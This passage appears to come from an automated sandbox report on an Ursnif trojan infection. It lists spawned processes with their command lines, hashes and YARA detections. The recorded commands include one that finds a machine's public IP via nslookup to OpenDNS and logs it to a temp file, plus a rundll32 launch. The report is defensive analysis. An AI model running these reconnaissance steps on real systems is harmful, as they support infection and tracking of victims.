                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000025.00000002.1185993315.0000027D4F702000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000025.00000000.970866897.0000027D4F800000.00000040.00020000.sdmp, Author: Joe Security

                                                          Analysis Process: cmd.exe PID: 5008 Parent PID: 3424

                                                          General

                                                          Start time:01:33:19
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\380E.bi1'
                                                          Imagebase:0x7ff622070000
                                                          File size:273920 bytes
                                                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Analysis Process: conhost.exe PID: 5336 Parent PID: 5008

                                                          General

                                                          Start time:01:33:22
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff724c50000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Analysis Process: nslookup.exe PID: 1424 Parent PID: 5008

                                                          General

                                                          Start time:01:33:23
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\nslookup.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:nslookup myip.opendns.com resolver1.opendns.com
                                                          Imagebase:0x7ff73b890000
                                                          File size:86528 bytes
                                                          MD5 hash:AF1787F1DBE0053D74FC687E7233F8CE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Analysis Process: cmd.exe PID: 3512 Parent PID: 3424

                                                          General

                                                          Start time:01:33:26
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /C 'echo -------- >> C:\Users\user\AppData\Local\Temp\380E.bi1'
                                                          Imagebase:0x7ff622070000
                                                          File size:273920 bytes
                                                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Analysis Process: rundll32.exe PID: 6508 Parent PID: 4868

                                                          General

                                                          Start time:01:33:26
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\rundll32.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                                                          Imagebase:0x7ff66d750000
                                                          File size:69632 bytes
                                                          MD5 hash:73C519F050C20580F8A62C849D49215A
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000002D.00000000.973903195.000002D2D67C0000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000002D.00000000.971901239.000002D2D67C0000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002D.00000003.976333462.000002D2D6E3C000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000002D.00000002.977715932.000002D2D67C1000.00000020.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000002D.00000000.975140453.000002D2D67C0000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002D.00000003.976409970.000002D2D6E3C000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002D.00000003.976255392.000002D2D6E3C000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002D.00000002.979102398.000002D2D6E3C000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002D.00000003.976439736.000002D2D6E3C000.00000004.00000040.sdmp, Author: Joe Security

                                                          Analysis Process: RuntimeBroker.exe PID: 4268 Parent PID: 3424

                                                          General

                                                          Start time:01:33:35
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\RuntimeBroker.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                          Imagebase:0x7ff6b0ff0000
                                                          File size:99272 bytes
                                                          MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000002E.00000002.1184353403.000001B4FABB1000.00000020.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000002E.00000000.1013485765.000001B4FABB0000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000002E.00000000.1018879466.000001B4FABB0000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000002E.00000000.1024534203.000001B4FABB0000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002E.00000002.1188409559.000001B4FB502000.00000004.00000001.sdmp, Author: Joe Security

                                                          Analysis Process: conhost.exe PID: 612 Parent PID: 3512

                                                          General

                                                          Start time:01:33:38
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff724c50000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Analysis Process: RuntimeBroker.exe PID: 4772 Parent PID: 3424

                                                          General

                                                          Start time:01:33:54
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\RuntimeBroker.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                          Imagebase:0x7ff6b0ff0000
                                                          File size:99272 bytes
                                                          MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000030.00000002.1184142574.000001DA4C802000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000030.00000000.1056728839.000001DA4C260000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000030.00000002.1182359593.000001DA4C261000.00000020.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000030.00000000.1049623811.000001DA4C260000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000030.00000000.1045657858.000001DA4C260000.00000040.00020000.sdmp, Author: Joe Security

                                                          Analysis Process: cmd.exe PID: 1260 Parent PID: 3424

                                                          General

                                                          Start time:01:34:00
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:'C:\Windows\syswow64\cmd.exe' /C pause dll mail, ,
                                                          Imagebase:0x11d0000
                                                          File size:232960 bytes
                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000031.00000003.1072894975.00000000010F8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000031.00000003.1072798456.00000000010F8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000031.00000002.1074072106.00000000010F8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000031.00000003.1072599923.00000000010F8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000031.00000003.1072653572.00000000010F8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000031.00000003.1072532170.00000000010F8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000031.00000003.1072835287.00000000010F8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000031.00000003.1072860777.00000000010F8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000031.00000003.1072702315.00000000010F8000.00000004.00000040.sdmp, Author: Joe Security

                                                          Disassembly

                                                          Code Analysis

                                                          Reset < >